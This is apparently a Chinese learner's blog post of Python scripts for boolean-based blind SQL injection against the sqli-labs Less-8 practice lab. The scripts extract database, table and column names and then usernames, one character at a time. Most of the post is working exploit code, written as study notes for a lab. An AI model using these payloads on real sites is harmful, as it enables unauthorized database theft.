sql注入 布尔盲注基础脚本
基础SQL注入过了一遍,盲注一直不太熟,在sqli-labs上练习盲注时也是找到注入点后上sqlmap。今天学习用python写sql注入脚本,才发现很多语句不熟,从网上找了一篇教程,自己照着写了写,有些地方自己改了改,感觉收获很大。[这是参照的文章](https://www.cnblogs.com/lzlzzzzzz/p/13998552.html,想了想,这也算转载吧。。。
以sqli-labs第八关为例写的
爆数据库名和表名
import requests
s = requests.session()
url = "http://192.168.43.190/sqli-labs/Less-8/?id=1"
#payloads = 'qwertyuioplkjhgfdsazxcvbnm1234567890'(数字和字符比较时字符会转成0吧,用ascii吧)
#headers={'cookie':''}
#爆数据库名长度
for l in range(1,30):
databaselen_payload = "' and length(database())="+str(l)+"%23"
if "You are in..........." in s.get(url+databaselen_payload).text:
databaselen=l
break
print("database_length:"+str(databaselen))
#爆数据库名
database_name=''
for l in range(1,databaselen+1):
for i in range(1,128):
# for i in payloads:
database_payload = "' and ascii(substr(database(),"+str(l)+",1))="+str(i)+"%23"
if "You are in" in s.get(url+database_payload).text:
database_name = database_name + chr(i)
break
print("database_name:",database_name)
#爆表个数
for l in range(1,50):
tableNumber_payload = "' and (select count(table_name) from information_schema.tables where table_schema=database())="+str(l)+"%23"
if "You are in" in s.get(url+tableNumber_payload).text:
tableNumber = l
break
print("tableNumber:",tableNumber)
#爆表名
#先爆表名长度
for l in range(0,tableNumber):#第几个表
table_name = ''
for i in range(1,50):#爆破表名长度
tableLen_payload = "' and length(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(l)+",1),1))="+str(i)+"%23"
if "You are in" in s.get(url+tableLen_payload).text:
tableLen = i
break
print("table"+str(l+1)+":",tableLen)
#爆表名
for m in range(0,tableLen+1):
for n in range(1,128):
tableName_payload = "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(l)+",1),"+str(m)+",1))="+str(n)+"%23"
if "You are in" in s.get(url+tableName_payload).text:
table_name = table_name + chr(n)
break
print("tableName"+str(l+1)+":"+table_name)爆列名
import requests
s = requests.session()
url = "http://192.168.43.190/sqli-labs/Less-8/?id=1"
#判断列数
for l in range(1,50):
columnNumber_payload = "' and (select count(column_name) from information_schema.columns where table_name='users')="+str(l)+"%23"#选表
if "You are in..........." in s.get(url+columnNumber_payload).text:
columnNumber = l
break
print("columnNumber:",columnNumber)
#爆列名长度
#爆列名
for l in range(0,columnNumber):#第几个表
columnName = ''
for i in range(1,50):
columnLen_payload = "' and length(substr((select column_name from information_schema.columns where table_name='users' limit "+str(l)+",1),1))="+str(i)+"%23"
if "You are in..........." in s.get(url+columnLen_payload).text:
columnLen = i
break
print("column"+str(l+1)+"Len:",columnLen)
#爆列名
for m in range(1,columnLen+1):
for n in range(1,128):
columnName_payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(l)+",1),"+str(m)+",1))="+str(n)+"%23"
if "You are in..........." in s.get(url+columnName_payload).text:
columnName = columnName + chr(n)
break
print("columnName"+str(l+1)+":"+columnName)爆指定字段(手动指定)
import requests
s = requests.session()
url = "http://192.168.43.190/sqli-labs/Less-8/?id=1"
#选择性爆字段
#包含数据条数
for l in range(1,499):
shujuNumber_payload = "' and (select count(username) from users)="+str(l)+"%23"#从users表中选username列
if "You are in..........." in s.get(url+shujuNumber_payload).text:
shujuNumber = l
break
print("数据条数:",shujuNumber)
#数据内容
for l in range(0,shujuNumber):
shuju = ''
for i in range(1,20):
shujuLen_payload = "' and length(substr((select username from users limit "+str(l)+",1),1))="+str(i)+"%23"
if "You are in..........." in s.get(url+shujuLen_payload).text:
shujuLen = i
break
for m in range(1,shujuLen+1):
for n in range(1,128):
shuju_payload = "' and ascii(substr((select username from users limit "+str(l)+",1),"+str(m)+",1))="+str(n)+"%23"
if "You are in..........." in s.get(url+shuju_payload).text:
shuju = shuju + chr(n)
break
print(l+1,":",shuju)用起来体验不是太好(用起来要改的地方不少),二分法比我这种快,不过目前暂时够用了